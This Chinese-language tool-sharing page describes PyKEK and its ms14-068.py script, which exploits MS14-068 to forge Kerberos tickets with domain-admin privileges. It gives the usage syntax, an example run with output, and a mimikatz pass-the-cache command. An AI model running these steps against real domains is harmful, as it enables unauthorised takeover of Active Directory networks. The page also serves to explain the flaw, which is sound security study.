Kerberos漏洞利用工具包
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/mubix/pykek
小编推荐
PyKEK是一个用于操纵KRB5相关数据的Python库,可用于利用MS14-068(CVE-2014-6324)漏洞。该库包含以下内容:
相关技术点
- kek.krb5: Kerberos V5 ASN.1结构和基本协议函数
- kek.ccache: 凭证缓存二进制格式
- kek.pac: Microsoft特权属性证书数据结构
- kek.crypto: Kerberos和MS特定的加密函数
项目用途
该项目旨在演示如何利用Kerberos漏洞。 ms14-068.py脚本可以利用MS14-068漏洞在未打补丁的域控制器上,获取现有域用户帐户的Kerberos票据,具备以下域组的特权:
- Domain Users (513)
- Domain Admins (512)
- Schema Admins (518)
- Enterprise Admins (519)
- Group Policy Creator Owners (520)
用户可以使用该项目了解漏洞利用的原理和方法,以及如何保护系统。
Python Kerberos Exploitation Kit
PyKEK(Python Kerberos Exploitation Kit)是一个用于操作KRB5相关数据的Python库。(目前还在开发中)
目前,只有一些功能已经以相当粗糙的方式实现(用于利用MS14-068(CVE-2014-6324))。
更多功能即将推出...
作者
Sylvain Monné
联系方式:sylvain dot monne at solucom dot fr
库内容
- kek.krb5:Kerberos V5(RFC 4120)ASN.1结构和基本协议函数
- kek.ccache:凭据缓存二进制格式(cchache)
- kek.pac:Microsoft特权属性证书数据结构(MS-PAC)
- kek.crypto:Kerberos和MS特定的加密函数
漏洞利用
ms14-068.py
利用MS14-680漏洞,获取具有以下域组权限的现有域用户帐户的Kerberos票据,用于未打补丁的Active Directory域中的域控制器:
- 域用户(513)
- 域管理员(512)
- 架构管理员(518)
- 企业管理员(519)
- 组策略创建者所有者(520)
用法:
USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
OPTIONS:
-p <clearPassword>
--rc4 <ntlmHash>
示例用法:
Linux(使用samba和MIT Kerberos进行测试)
root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
在Windows上
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`
标签:工具分享, 云安全, Kerberos